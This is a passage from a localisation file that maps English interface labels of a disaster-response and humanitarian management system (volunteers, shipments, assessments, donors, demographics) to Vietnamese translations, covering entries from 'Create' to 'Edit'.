Type': 'Thêm loại hình tổ chức', 'Create Organization': 'Thêm tổ chức', 'Create PDF': 'Tạo PDF', 'Create Partner Organization': 'Thêm tổ chức đối tác', 'Create Program': 'Thêm chương trình', 'Create Project': 'Thêm dự án', 'Create Projection': 'Thêm dự đoán', 'Create Question Meta-Data': 'Thêm siêu dữ liệu câu hỏi', 'Create Report': 'Thêm báo cáo mới', 'Create Repository': 'Thêm kho chứa', 'Create Request': 'Khởi tạo yêu cầu', 'Create Resource': 'Thêm nguồn lực', 'Create Role': 'Thêm vai trò', 'Create Room': 'Thêm phòng', 'Create Sector': 'Thêm lĩnh vực', 'Create Shelter': 'Thêm Nơi cư trú mới', 'Create Skill Type': 'Thêm loại kỹ năng', 'Create Skill': 'Thêm kỹ năng', 'Create Staff Member': 'Thêm cán bộ', 'Create Status': 'Thêm trạng thái', 'Create Supplier': 'Thêm nhà cung cấp', 'Create Symbology': 'Thêm biểu tượng', 'Create Task': 'Thêm nhiệm vụ', 'Create Team': 'Tạo đội TNV', 'Create Theme': 'Thêm chủ đề', 'Create Training Event': 'Thêm khóa tập huấn', 'Create User': 'Thêm người dùng', 'Create Volunteer Cluster Position': 'Thêm vi trí của nhóm tình nguyện viên', 'Create Volunteer Cluster Type': 'Thêm loại hình nhóm tình nguyện viên', 'Create Volunteer Cluster': 'Thêm nhóm tình nguyện viên', 'Create Volunteer Role': 'Thêm vai trò của tình nguyện viên', 'Create Volunteer': 'Thêm tình nguyện viên', 'Create Warehouse': 'Thêm kho hàng', 'Create a Person': 'Thêm họ tên', 'Create a group entry in the registry.': 'Tạo ghi chép nhóm trong hồ sơ đăng ký', 'Create a new Team': 'Tạo đội TNV mới', 'Create a new facility or ensure that you have permissions for an existing facility.': 'Tạo tiện ích mới hoặc đảm bảo rằng bạn có quyền truy cập vào tiện ích sẵn có', 'Create a new organization or ensure that you have permissions for an existing organization.': 'Tạo tổ chức mới hoặc đảm bảo rằng bạn có quyền truy cập vào một tổ chức có sẵn', 'Create alert': 'Tạo cảnh báo', 'Create an Assessment Question': 'Thêm câu hỏi trong mẫu đánh giá', 'Create search': 'Thêm tìm kiếm', 'Create template': 'Tạo mẫu biểu', 'Create': 'Thêm', 'Created By': 'Tạo bởi', 'Created by': 'Tạo bởi', 'Credential Details': 'Thông tin thư ủy nhiệm', 'Credential added': 'Thư ủy nhiệm đã được thêm', 'Credential deleted': 'Thư ủy nhiệm đã được xóa', 'Credential updated': 'Thư ủy nhiệm đã được cập nhật', 'Credentialling Organization': 'Tổ chức ủy nhiệm', 'Credentials': 'Thư ủy nhiệm', 'Crime': 'Tội phạm', 'Criteria': 'Tiêu chí', 'Critical Infrastructure': 'Cở sở hạ tầng trọng yếu', 'Currency': 'Tiền tệ', 'Current Group Members': 'Nhóm thành viên hiện tại', 'Current Home Address': 'Địa chỉ nhà riêng hiện tại', 'Current Identities': 'Nhận dạng hiện tại', 'Current Location': 'Vị trí hiện tại', 'Current Memberships': 'Thành viên hiện tại', 'Current Owned By (Organization/Branch)': 'Hiện tại đang được sở hữu bởi (Tổ chức/ cơ sở)', 'Current Status': 'Trạng thái hiện tại', 'Current Twitter account': 'Tài khoản Twitter hiện tại', 'Current request': 'Yêu cầu hiện tại', 'Current response': 'Hoạt động ưng phó hiện tại', 'Current session': 'Phiên họp hiện tại', 'Current': 'Đang đề xuất', 'Currently no Certifications registered': 'Hiện tại chưa có chứng nhận nào được đăng ký', 'Currently no Course Certificates registered': 'Hiện tại chưa có chứng nhận khóa tập huấn nào được đăng ký', 'Currently no Credentials registered': 'Hiện tại chưa có thư ủy nhiệm nào được đăng ký', 'Currently no Participants registered': 'Hiện tại chưa có người tham dự nào đăng ký', 'Currently no Professional Experience entered': 'Hiện tại chưa có kinh nghiệm nghề nghiệp nào được nhập', 'Currently no Skill Equivalences registered': 'Hiện tại chưa có kỹ năng tương đương nào được đăng ký', 'Currently no Skills registered': 'Hiện tại chưa có kỹ năng nào được đăng ký', 'Currently no Trainings registered': 'Hiện tại chưa có khóa tập huấn nào được đăng ký', 'Currently no entries in the catalog': 'Hiện chưa có hồ sơ nào trong danh mục', 'Currently no hours recorded for this volunteer': 'Hiện tại chưa có thời gian hoạt động được ghi cho tình nguyện viên này', 'Currently no programmes registered': 'Hiện tại chưa có chương trình nào được đăng ký', 'Currently no staff assigned': 'Hiện tại chưa có cán bộ nào được phân công', 'Currently no training events registered': 'Hiện tại chưa có khóa tập huấn nào được đăng ký', 'Customer': 'Khách hàng', 'Customisable category of aid': 'Các tiêu chí cứu trợ có thể tùy chỉnh', 'Cyclone': 'Bão', 'DATA QUALITY': 'CHẤT LƯỢNG DỮ LIỆU', 'DATA/REPORT': 'DỮ LIỆU/BÁO CÁO', 'DECIMAL_SEPARATOR': 'Ngăn cách bằng dấu phẩy', 'DELETE': 'XÓA', 'DRR': 'GTRRTH', 'DRRPP Extensions': 'Gia hạn DRRPP', 'Daily Work': 'Công việc hàng ngày', 'Daily': 'Hàng ngày', 'Dam Overflow': 'Tràn đập', 'Damaged': 'Thiệt hại', 'Dangerous Person': 'Người nguy hiểm', 'Dashboard': 'Bảng điều khiển', 'Data Quality': 'Chất lượng Dữ liệu', 'Data Source': 'Nguồn Dữ liệu', 'Data Type': 'Loại dữ liệu', 'Data added to Theme Layer': 'Dữ liệu đã được thêm vào lớp chủ đề', 'Data import error': 'Lỗi nhập khẩu dữ liệu', 'Data uploaded': 'Dữ liệu đã được tải lên', 'Data': 'Dữ liệu', 'Data/Reports': 'Dữ liệu/Báo cáo', 'Database Development': 'Xây dựng cơ sở dữ liệu', 'Database': 'Cơ sở Dữ liệu', 'Date Available': 'Ngày rãnh rỗi', 'Date Created': 'Ngày đã được tạo', 'Date Due': 'Ngày đến hạn', 'Date Expected': 'Ngày được mong muốn', 'Date Joined': 'Ngày tham gia', 'Date Needed By': 'Ngày cần bởi', 'Date Published': 'Ngày xuất bản', 'Date Question': 'Hỏi Ngày', 'Date Range': 'Khoảng thời gian', 'Date Received': 'Ngày Nhận được', 'Date Released': 'Ngày Xuất ra', 'Date Repacked': 'Ngày Đóng gói lại', 'Date Requested': 'Ngày Đề nghị', 'Date Required Until': 'Trước Ngày Đòi hỏi ', 'Date Required': 'Ngày Đòi hỏi', 'Date Sent': 'Ngày gửi', 'Date Taken': 'Ngày Nhận được', 'Date Until': 'Trước Ngày', 'Date and Time of Goods receipt. By default shows the current time but can be modified by editing in the drop down list.': 'Ngày giờ nhận hàng hóa.Hiển thị thời gian theo mặc định nhưng vẫn có thể chỉnh sửa', 'Date and Time': 'Ngày và giờ', 'Date must be %(max)s or earlier!': 'Ngày phải %(max)s hoặc sớm hơn!', 'Date must be %(min)s or later!': 'Ngày phải %(min)s hoặc muộn hơn!', 'Date must be between %(min)s and %(max)s!': 'Ngày phải trong khoản %(min)s và %(max)s!', 'Date of Birth': 'Ngày Sinh', 'Date of Report': 'Ngày báo cáo', 'Date of adjustment': 'Điều chỉnh ngày', 'Date of submission': 'Ngày nộp', 'Date resigned': 'Ngày từ nhiệm', 'Date': 'Ngày bắt đầu', 'Date/Time of Alert': 'Ngày/Giờ Cảnh báo', 'Date/Time of Dispatch': 'Ngày/Giờ Gửi', 'Date/Time of Find': 'Ngày giờ tìm kiếm', 'Date/Time': 'Ngày/Giờ', 'Day': 'Ngày', 'De-duplicator': 'Bộ chống trùng', 'Dead Bodies': 'Các xác chết', 'Dead Body Reports': 'Báo cáo thiệt hại về người', 'Dead Body': 'Xác chết', 'Deaths/24hrs': 'Số người chết/24h', 'Deceased': 'Đã chết', 'Decimal Degrees': 'Độ âm', 'Decision': 'Quyết định', 'Decline failed': 'Thất bại trong việc giảm', 'Default Base layer?': 'Lớp bản đồ cơ sở mặc định', 'Default Location': 'Địa điểm mặc định', 'Default Marker': 'Đánh dấu mặc định', 'Default Realm = All Entities the User is a Staff Member of': 'Realm mặc định=tất cả các đơn vị, người Sử dụng là cán bộ thành viên của', 'Default Realm': 'Realm mặc định', 'Default map question': 'Câu hỏi bản đồ mặc định', 'Default synchronization policy': 'Chính sách đồng bộ hóa mặc định', 'Default': 'Mặc định', 'Defaults': 'Mặc định', 'Defines the icon used for display of features on handheld GPS.': 'Định nghĩa biểu tượng được sử dụng để miêu tả các chức năng trên máy GPS cầm tay.', 'Defines the icon used for display of features on interactive map & KML exports.': 'Định nghĩa biểu tượng được sử dụng để miêu tả các chức năng trên bản đồ tương tác và chiết xuất KML.', 'Degrees in a latitude must be between -90 to 90.': 'Giá trị vĩ độ phải trong khoảng -90 tới 90', 'Degrees in a longitude must be between -180 to 180.': 'Giá trị kinh độ phải nằm giữa -180 tới 180', 'Degrees must be a number.': 'Độ: phải hiển thị bằng số', 'Delete Affiliation': 'Xóa liên kết', 'Delete Aid Request': 'Xóa yêu cầu cứu trợ', 'Delete Alternative Item': 'Xóa mặt hàng thay thế', 'Delete Asset Log Entry': 'Xóa ghi chép nhật ký tài sản', 'Delete Asset': 'Xóa tài sản', 'Delete Branch': 'Xóa tổ chức cơ sở', 'Delete Brand': 'Xóa nhãn hiệu', 'Delete Budget': 'Xóa ngân sách', 'Delete Catalog Item': 'Xóa mặt hang trong danh mục', 'Delete Catalog': 'Xóa danh mục', 'Delete Certificate': 'Xóa chứng chỉ', 'Delete Certification': 'Xóa bằng cấp', 'Delete Cluster': 'Xóa nhóm', 'Delete Commitment Item': 'Xóa mặt hàng cam kết', 'Delete Commitment': 'Xóa cam kết', 'Delete Competency Rating': 'Xóa xếp loại năng lực', 'Delete Config': 'Xóa cấu hình', 'Delete Contact Information': 'Xóa thông tin liên hệ', 'Delete Course Certificate': 'Xóa chứng chỉ khóa học', 'Delete Course': 'Xóa khóa học', 'Delete Credential': 'Xóa thư ủy nhiệm', 'Delete Data from Theme layer': 'Xoá dữ liệu khỏi lớp chủ đề', 'Delete Department': 'Xóa phòng/ban', 'Delete Document': 'Xóa tài liệu', 'Delete Donor': 'Xóa nhà tài trợ', 'Delete Facility Type': 'Xóa loại hinh bộ phận', 'Delete Facility': 'Xóa bộ phận', 'Delete Feature Layer': 'Xóa lớp chức năng', 'Delete Group': 'Xóa nhóm', 'Delete Hazard': 'Xóa hiểm họa', 'Delete Hospital': 'Xóa Bệnh viện', 'Delete Hours': 'Xóa thời gian hoạt động', 'Delete Image': 'Xóa hình ảnh', 'Delete Incident Report': 'Xóa báo cáo sự kiện', 'Delete Inventory Store': 'Xóa kho lưu trữ', 'Delete Item Category': 'Xóa danh mục hàng hóa', 'Delete Item Pack': 'Xóa gói hàng', 'Delete Item from Request': 'Xóa mặt hàng từ yêu cầu', 'Delete Item': 'Xóa mặt hàng', 'Delete Job Role': 'Xóa vai trò công việc', 'Delete Job Title': 'Xóa chức danh', 'Delete Kit': 'Xóa dụng cụ', 'Delete Layer': 'Xóa lớp', 'Delete Location Hierarchy': 'Xóa thứ tự địa điểm', 'Delete Location': 'Xóa địa điểm', 'Delete Mailing List': 'Xóa danh sách gửi thư', 'Delete Map Profile': 'Xóa cài đặt cấu hình bản đồ', 'Delete Marker': 'Xóa công cụ đánh dấu', 'Delete Member': 'Xóa hội viên', 'Delete Membership Type': 'Xóa loại hình nhóm hội viên', 'Delete Membership': 'Xóa nhóm hội viên', 'Delete Message': 'Xóa tin nhắn', 'Delete Metadata': 'Xóa siêu dữ liệu', 'Delete National Society': 'Xóa Hội Quốc gia', 'Delete Office Type': 'Xóa loại hình văn phòng', 'Delete Office': 'Xóa văn phòng', 'Delete Order': 'Xóa đơn đặt hàng', 'Delete Organization Domain': 'Xóa lĩnh vực hoạt động của tổ chức', 'Delete Organization Type': 'Xóa loại hình tổ chức', 'Delete Organization': 'Xóa tổ chức', 'Delete Participant': 'Xóa người tham dự', 'Delete Partner Organization': 'Xóa tổ chức đối tác', 'Delete Person': 'Xóa đối tượng', 'Delete Photo': 'Xóa ảnh', 'Delete Professional Experience': 'Xóa kinh nghiệm nghề nghiệp', 'Delete Program': 'Xóa chương trình', 'Delete Project': 'Xóa dự án', 'Delete Projection': 'Xóa dự đoán', 'Delete Received Shipment': 'Xóa lô hàng đã nhận', 'Delete Record': 'Xóa hồ sơ', 'Delete Report': 'Xóa báo cáo', 'Delete Request Item': 'Xóa yêu cầu hàng hóa', 'Delete Request': 'Xóa yêu cầu', 'Delete Role': 'Xóa vai trò', 'Delete Room': 'Xóa phòng', 'Delete Sector': 'Xóa lĩnh vực', 'Delete Sent Shipment': 'Xóa lô hàng đã gửi', 'Delete Service Profile': 'Xóa hồ sơ đăng ký dịch vụ', 'Delete Shipment Item': 'Xóa mặt hàng trong lô hàng', 'Delete Skill Equivalence': 'Xóa kỹ năng tương đương', 'Delete Skill Type': 'Xóa loại kỹ năng', 'Delete Skill': 'Xóa kỹ năng', 'Delete Staff Assignment': 'Xóa phân công cho cán bộ', 'Delete Staff Member': 'Xóa cán bộ', 'Delete Status': 'Xóa tình trạng', 'Delete Stock Adjustment': 'Xóa điều chỉnh hàng lưu kho', 'Delete Supplier': 'Xóa nhà cung cấp', 'Delete Survey Question': 'Xóa câu hỏi khảo sát', 'Delete Survey Template': 'Xóa mẫu khảo sát', 'Delete Symbology': 'Xóa biểu tượng', 'Delete Theme': 'Xóa chủ đề', 'Delete Training Event': 'Xóa sự kiện tập huấn', 'Delete Training': 'Xóa tập huấn', 'Delete Unit': 'Xóa đơn vị', 'Delete User': 'Xóa người dùng', 'Delete Volunteer Cluster Position': 'Xóa vị trí nhóm tình nguyện viên', 'Delete Volunteer Cluster Type': 'Xóa loại hình nhóm tình nguyện viên', 'Delete Volunteer Cluster': 'Xóa nhóm tình nguyện viên', 'Delete Volunteer Role': 'Xóa vai trò của tình nguyện viên', 'Delete Volunteer': 'Xóa tình nguyện viên', 'Delete Warehouse': 'Xóa kho hàng', 'Delete all data of this type which the user has permission to before upload. This is designed for workflows where the data is maintained in an offline spreadsheet and uploaded just for Reads.': 'Xóa tất cả dữ liệu loại này mà người dùng có quyền truy cập trước khi tải lên. Việc này được thiết kế cho chu trình làm việc mà dữ liệu được quản lý trên excel ngoại tuyến và được tải lên chỉ để đọc.', 'Delete from Server?': 'Xóa khỏi máy chủ', 'Delete saved search': 'Xóa tìm kiếm đã lưu', 'Delete this Assessment Answer': 'Xóa câu trả lời này trong mẫu đánh giá', 'Delete this Assessment Question': 'Xóa câu hỏi này trong mẫu đánh giá', 'Delete this Assessment Template': 'Xóa biểu mẫu đánh giá này', 'Delete this Completed Assessment Form': 'Xóa biểu mẫu đánh giá đã được hoàn thiện này', 'Delete this Disaster Assessment': 'Xóa đánh giá thảm họa này', 'Delete this Question Meta-Data': 'Xóa siêu dữ liệu câu hỏi này', 'Delete this Template Section': 'Xóa nội dung này trong biểu mẫu', 'Delete': 'Xóa', 'Deliver To': 'Gửi tới', 'Delivered By': 'Được bởi', 'Delivered To': 'Đã gửi tới', 'Demographic Data Details': 'Thông tin số liệu dân số', 'Demographic Data added': 'Số liệu dân số đã được thêm', 'Demographic Data deleted': 'Số liệu dân số đã được xóa', 'Demographic Data updated': 'Số liệu dân số đã được cập nhật', 'Demographic Data': 'Số liệu dân số', 'Demographic Details': 'Thông tin dân số', 'Demographic Source Details': 'Thông tin về nguồn dữ liệu dân số', 'Demographic Sources': 'Nguồn dữ liệu dân số', 'Demographic added': 'Dữ liệu nhân khẩu đã được thêm', 'Demographic data': 'Số liệu dân số', 'Demographic deleted': 'Dữ liệu nhân khẩu đã được xóa', 'Demographic source added': 'Nguồn số liệu dân số đã được thêm', 'Demographic source deleted': 'Nguồn số liệu dân số đã được xóa', 'Demographic source updated': 'Nguồn số liệu dân số đã được cập nhật', 'Demographic updated': 'Dữ liệu nhân khẩu đã được cập nhật', 'Demographic': 'Nhân khẩu', 'Demographics': 'Nhân khẩu', 'Demonstrations': 'Trình diễn', 'Dental Examination': 'Khám nha khoa', 'Dental Profile': 'Hồ sơ khám răng', 'Department / Unit': 'Ban / Đơn vị', 'Department Catalog': 'Danh sách phòng/ban', 'Department Details': 'Thông tin phòng/ban', 'Department added': 'Phòng ban đã được thêm', 'Department deleted': 'Phòng ban đã được xóa', 'Department updated': 'Phòng ban đã được cập nhật', 'Deployment Location': 'Địa điểm điều động', 'Deployment Request': 'Yêu cầu điều động', 'Deployment': 'Triển khai', 'Describe the condition of the roads to your hospital.': 'Mô tả tình trạng các con đường tới bệnh viện.', "Describe the procedure which this record relates to (e.g. 'medical examination')": 'Mô tả qui trình liên quan tới hồ sơ này (ví dụ: "kiểm tra sức khỏe")', 'Description of Contacts': 'Mô tả thông tin mối liên lạc', 'Description of defecation area': 'Mo tả khu vực defecation', 'Description': 'Mô tả', 'Design, deploy & analyze surveys.': 'Thiết kế, triển khai và phân tích đánh giá.', 'Destination': 'Điểm đến', 'Destroyed': 'Bị phá hủy', 'Detailed Description/URL': 'Mô tả chi tiêt/URL', 'Details field is required!': 'Ô Thông tin chi tiết là bắt buộc!', 'Details of Disaster Assessment': 'Thông tin chi tiết về đánh giá thảm họa', 'Details of each question in the Template': 'Chi tiết về mỗi câu hỏi trong biểu mẫu', 'Details': 'Chi tiết', 'Dignitary Visit': 'Chuyến thăm cấp cao', 'Direction': 'Định hướng', 'Disable': 'Vô hiệu', 'Disabled': 'Đã tắt', 'Disaster Assessment Chart': 'Biểu đồ đánh giá thảm họa', 'Disaster Assessment Map': 'Bản đồ đánh giá thảm họa', 'Disaster Assessment Summary': 'Tóm tắt đánh giá thảm họa', 'Disaster Assessment added': 'Báo cáo đánh giá thảm họa đã được thêm', 'Disaster Assessment deleted': 'Báo cáo đánh giá thảm họa đã được xóa', 'Disaster Assessment updated': 'Báo cáo đánh giá thảm họa đã được cập nhật', 'Disaster Assessments': 'Đánh giá thảm họa', 'Disaster Law': 'Luật phòng, chống thiên tai', 'Disaster Risk Management': 'QLRRTH', 'Disaster Risk Reduction': 'GTRRTH', 'Disaster Victim Identification': 'Nhận dạng nạn nhân trong thảm họa', 'Disaster chemical spill/leak, explosions, collapses, gas leaks, urban fire, oil spill, technical failure': 'rò rỉ hóa học, nổ, rò khí ga, hỏa hoạn trong đô thị, tràn dầu', 'Disciplinary Action Type': 'Hình thức kỷ luật', 'Disciplinary Body': 'Cấp kỷ luật', 'Disciplinary Record': 'Kỷ luật', 'Discussion Forum': 'Diễn đàn thảo luận', 'Dispatch Time': 'Thời gian gửi đi', 'Dispatch': 'Gửi đi', 'Dispensary': 'Y tế dự phòng', 'Displaced Populations': 'Dân cư bị sơ tán', 'Display Chart': 'Hiển thị biểu đồ', 'Display Polygons?': 'Hiển thị hình đa giác?', 'Display Question on Map': 'Hiển thị câu hỏi trên bản đồ', 'Display Routes?': 'Hiển thị tuyến đường?', 'Display Selected Questions': 'Hiển thị câu hỏi được lựa chọn', 'Display Tracks?': 'Hiển thị dấu vết?', 'Display Waypoints?': 'Hiển thị các cột báo trên đường?', 'Display': 'Hiển thị', 'Distance from %s:': 'Khoảng cách từ %s:', 'Distribution Item Details': 'Chi tiết hàng hóa cứu trợ ', 'Distribution Item': 'Hàng hóa đóng góp', 'Distribution groups': 'Nhóm cấp phát', 'Distribution of Food': 'Cấp phát lương thực', 'Distribution of Non-Food Items': 'Cấp phát các mặt hàng phi lương thực', 'Distribution of Shelter Repair Kits': 'Cấp phát bộ dụng cụ sửa nhà', 'Distribution': 'Cấp phát', 'District': 'Quận/ Huyện', 'Diversifying Livelihoods': 'Đa dạng nguồn sinh kế', 'Divorced': 'Ly hôn', 'Do you really want to approve this record?': 'Bạn có thực sự muốn chấp thuân hồ sơ này không?', 'Do you really want to delete these records?': 'Bạn có thực sự muốn xóa các hồ sơ này không?', 'Do you really want to delete this record? (This action can not be reversed)': 'Bạn có thực sự muốn xóa hồ sơ này không? (Hồ sơ không thể khôi phục lại sau khi xóa)', 'Do you want to cancel this received shipment? The items will be removed from the Warehouse. This action CANNOT be undone!': 'Bạn có muốn hủy lô hàng đã nhận được này không? Hàng hóa này sẽ bị xóa khỏi Kho hàng. Dữ liệu không thể khôi phục lại sau khi xóa!', 'Do you want to cancel this sent shipment? The items will be returned to the Warehouse. This action CANNOT be undone!': 'Bạn có muốn hủy Lô hàng đã nhận được này không? Hàng hóa này sẽ được trả lại Kho hàng. Dữ liệu không thể khôi phục lại sau khi xóa!', 'Do you want to close this adjustment?': 'Bạn có muốn đóng điều chỉnh này lại?', 'Do you want to complete the return process?': 'Bạn có muốn hoàn thành quá trình trả lại hàng này?', 'Do you want to over-write the file metadata with new default values?': 'Bạn có muốn thay dữ liệu file bằng giá trị mặc định mới không?', 'Do you want to receive this shipment?': 'Bạn có muốn nhận lô hàng này?', 'Do you want to send this shipment?': 'Bạn có muốn gửi lô hàng này?', 'Document Details': 'Chi tiết tài liệu', 'Document Scan': 'Quyét Tài liệu', 'Document added': 'Tài liệu đã được thêm', 'Document deleted': 'Tài liệu đã được xóa', 'Document updated': 'Tài liệu đã được cập nhật', 'Document': 'Tài liệu', 'Documents': 'Tài liệu', 'Doing nothing (no structured activity)': 'Không làm gì (không có hoạt động theo kế hoạch', 'Domain': 'Phạm vi hoạt động', 'Domestic chores': 'Công việc nội trợ', 'Donated': 'Đã tài trợ', 'Donating Organization': 'Tổ chức tài trợ', 'Donation Phone #': 'Số điện thoại để ủng hộ', 'Donation': 'Ủng hộ', 'Donor Details': 'Thông tin nhà tài trợ', 'Donor Driven Housing Reconstruction': 'Xây lại nhà theo yêu cầu của nhà tài trợ', 'Donor added': 'Nhà tài trợ đã được thêm', 'Donor deleted': 'Nhà tài trợ đã được xóa', 'Donor updated': 'Nhà tài trợ đã được cập nhật', 'Donor': 'Nhà Tài trợ', 'Donors': 'Nhà tài trợ', 'Donor(s)': 'Nhà tài trợ', 'Donors Report': 'Báo cáo nhà tài trợ', 'Download Assessment Form Document': 'Biểu mẫu đánh giá đã dạng văn bản được tải về', 'Download Assessment Form Spreadsheet': 'Biểu mẫu đánh giá đã dạng excel được tải về', 'Download OCR-able PDF Form': 'Tải về biểu mẫu định dạng OCR-able PDF', 'Download Template': 'Tải Mẫu nhập liệu', 'Download last build': 'Tải về bộ tài liệu cập nhật nhất', 'Download': 'Tải về', 'Download.CSV formatted Template': 'Tải về biểu mẫu định dạng CSV', 'Draft Features': 'Chức năng dự thảo', 'Draft': 'Dự thảo', 'Drainage': 'Hệ thống thoát nước', 'Draw a square to limit the results to just those within the square.': 'Vẽ một ô vuông để giới hạn kết quả tìm kiếm chỉ nằm trong ô vuông đó', 'Driving License': 'Giấy phép lái xe', 'Drought': 'Hạn hán', 'Drugs': 'Thuốc', 'Due %(date)s': 'hết hạn %(date)s', 'Dug Well': 'Đào giếng', 'Dump': 'Trút xuống', 'Duplicate Locations': 'Nhân đôi các vị trí', 'Duplicate label selected': 'Nhân đôi biểu tượng đã chọn', 'Duplicate': 'Nhân đôi', 'Duration (months)': 'Khoảng thời gian (tháng)', 'Dust Storm': 'Bão cát', 'EMS Status': 'Tình trạng EMS', 'Early Warning': 'Cảnh báo sớm', 'Earthquake': 'Động đất', 'Economics of DRR': 'Tính kinh tế của GTRRTH', 'Edit Activity Type': 'Chỉnh sửa loại hình hoạt động', 'Edit Activity': 'Chỉnh sửa hoạt động', 'Edit Address': 'Chỉnh sửa địa chỉ', 'Edit Adjustment': 'Chỉnh sửa điều chỉnh', 'Edit Affiliation': 'Chỉnh sửa liên kết', 'Edit Aid Request': 'Chỉnh sửa Yêu cầu cứu trợ', 'Edit Alternative Item': 'Chỉnh sửa mặt hàng thay thê', 'Edit Annual Budget': 'Chỉnh sửa ngân sách năm', 'Edit Assessment Answer': 'Chỉnh sửa câu trả lời trong mẫu đánh giá', 'Edit Assessment Question': 'Chỉnh sửa câu trả hỏi trong mẫu đánh giá', 'Edit Assessment Template': 'Chỉnh sửa biểu mẫu đánh giá', 'Edit Assessment': 'Chỉnh sửa Đánh giá', 'Edit Asset Log Entry': 'Chỉnh sửa ghi chép nhật ký tài sản', 'Edit Asset': 'Chỉnh sửa tài sản', 'Edit Beneficiaries': 'Chỉnh sửa người hưởng lợi', 'Edit Beneficiary Type': 'Chỉnh sửa loại người hưởng lợi', 'Edit Branch Organization': 'Chỉnh sửa tổ chức cơ sở', 'Edit Brand': 'Chỉnh sửa nhãn hiệu', 'Edit Catalog Item': 'Chỉnh sửa mặt hàng trong danh mục', 'Edit Catalog': 'Chỉnh sửa danh mục hàng hóa', 'Edit Certificate': 'Chỉnh sửa chứng chỉ', 'Edit Certification': 'Chỉnh sửa bằng cấp', 'Edit Cluster': 'Chỉnh sửa nhóm', 'Edit Commitment Item': 'Chỉnh sửa mặt hàng cam kết', 'Edit Commitment': 'Chỉnh sửa cam kết', 'Edit Committed Person': 'Chỉnh sửa đối tượng cam kết', 'Edit Community Details': 'Chỉnh sửa thông tin về cộng đồng', 'Edit Competency Rating': 'Chỉnh sửa xếp hạng năng lực', 'Edit Completed Assessment Form': 'Chỉnh sửa biểu mẫu đánh giá đã hoàn thiện', 'Edit Contact Details': 'Chỉnh sửa thông tin liên hệ', 'Edit Contact Information': 'Chỉnh sửa thông tin liên hệ', 'Edit Course Certificate': 'Chỉnh sửa chứng chỉ khóa học', 'Edit Course': 'Chỉnh sửa khóa học', 'Edit Credential': 'Chỉnh sửa thư ủy nhiệm', 'Edit DRRPP Extensions': 'Chỉnh sửa gia hạn DRRPP', 'Edit Defaults': 'Chỉnh sửa mặc định', 'Edit Demographic Data': 'Chỉnh sửa số liệu dân số', 'Edit Demographic Source': 'Chỉnh sửa nguồn số liệu dân số', 'Edit Demographic': 'Chỉnh sửa dữ liệu nhân khẩu', 'Edit Department': 'Chỉnh sửa phòng/ban', 'Edit Description': 'Chỉnh sửa mô tả', 'Edit Details': 'Chỉnh sửa thông tin chi tiết', 'Edit Disaster Victims': 'Chỉnh sửa thông tin nạn nhân trong thiên tai', 'Edit Distribution': 'Chỉnh sửa Quyên góp', 'Edit Document': 'Chỉnh sửa tài liệu', 'Edit Donor': 'Chỉnh sửa nhà tài trợ', 'Edit Education Details': 'Chỉnh sửa thông tin về trình độ học vấn', 'Edit Email Settings': 'Chỉnh sửa cài đặt email', 'Edit Entry': 'Chỉnh sửa hồ sơ', 'Edit Facility Type': 'Chỉnh sửa loại hình bộ phận', 'Edit Facility': 'Chỉnh sửa bộ phận', 'Edit Feature Layer': 'Chỉnh sửa lớp chức năng', 'Edit Framework': 'Chỉnh sửa khung chương trình', 'Edit Group': 'Chỉnh sửa nhóm', 'Edit Hazard': 'Chỉnh sửa hiểm họa', 'Edit Hospital': 'Chỉnh sửa Bệnh viện', 'Edit Hours': 'Chỉnh sửa thời gian hoạt động', 'Edit Human Resource': 'Chỉnh sửa nguồn nhân lực', 'Edit Identification Report': 'Chỉnh sửa báo cáo định dạng', 'Edit Identity': 'Chỉnh sửa nhận dạng', 'Edit Image Details': 'Chỉnh sửa thông tin hình ảnh', 'Edit Image': 'Chỉnh sửa ảnh', 'Edit Incident Report': 'Chỉnh sửa báo cáo sự cố', 'Edit Incident': 'Chỉnh sửa Các sự việc xảy ra', 'Edit Item Catalog Categories': 'Chỉnh sửa danh mục hàng hóa', 'Edit Item Category': 'Chỉnh sửa danh mục hàng hóa', 'Edit Item Pack': 'Chỉnh sửa gói hàng', 'Edit Item in Request': 'Chỉnh sửa mặt hàng đang được yêu cầu', 'Edit Item': 'Chỉnh sửa mặt hàng', 'Edit Job Role': 'Chỉnh sửa chức năng nhiệm vụ', 'Edit Job Title': 'Chỉnh sửa chức danh', 'Edit Job': 'Chỉnh sửa công việc', 'Edit Key': 'Chỉnh sửa Key', 'Edit Layer': 'Chỉnh sửa lớp', 'Edit Level %d Locations?': 'Chỉnh sửa cấp độ %d địa điểm?', 'Edit Location Details': 'Chỉnh sửa chi tiết địa điểm', 'Edit Location Hierarchy': 'Chỉnh sửa thứ tự địa điểm', 'Edit Location': 'Chỉnh sửa địa điểm', 'Edit Log Entry': 'Chỉnh sửa ghi chép nhật ký', 'Edit Logged Time': 'Chỉnh sửa thời gian đăng nhập', 'Edit Mailing List': 'Chỉnh sửa danh sách gửi thư', 'Edit Map Profile': 'Chỉnh sửa cài đặt cấu hình bản đồ', 'Edit Map Services': 'Chỉnh sửa dịch vụ bản đồ', 'Edit Marker': 'Chỉnh sửa công cụ đánh dấu', 'Edit Member': 'Chỉnh sửa hội viên', 'Edit Membership Type': 'Chỉnh sửa loại hình nhóm hội viên', 'Edit Membership': 'Chỉnh sửa nhóm hội viên', 'Edit Message': 'Chỉnh sửa tin nhắn', 'Edit Messaging Settings': 'Chỉnh sửa thiết lập tin nhắn', 'Edit Metadata': 'Chỉnh sửa dữ liệu', 'Edit Milestone': 'Chỉnh sửa mốc thời gian quan trọng', 'Edit Modem Settings': 'Chỉnh sửa cài đặt Modem', 'Edit National Society': 'Chỉnh sửa Hội Quốc gia', 'Edit Office Type': 'Chỉnh sửa loại hình văn phòng', 'Edit Office': 'Chỉnh sửa văn phòng', 'Edit Options': 'Chỉnh sửa lựa chọn', 'Edit Order': 'Chỉnh sửa lệnh', 'Edit Organization Domain': 'Chỉnh sửa lĩnh vực hoạt động của tổ chức', 'Edit Organization Type': 'Chỉnh sửa loại hình tổ chức', 'Edit Organization': 'Chỉnh sửa tổ chức', 'Edit Output': 'Chỉnh sửa kết quả đầu ra', 'Edit Parser Settings': 'Chỉnh sửa cài đặt cú pháp', 'Edit Participant': 'Chỉnh sửa người tham dự', 'Edit Partner Organization': 'Chỉnh sửa tổ chức đối tác', 'Edit Peer Details': 'Chỉnh sửa chi tiết nhóm người', 'Edit Permissions for %(role)s': 'Chỉnh sửa quyền truy cập cho %(role)s', 'Edit Person Details': 'Chỉnh sửa thông tin cá nhân', 'Edit Photo': 'Chỉnh sửa ảnh', 'Edit Problem': 'Chỉnh sửa Vấn đề', 'Edit Professional Experience': 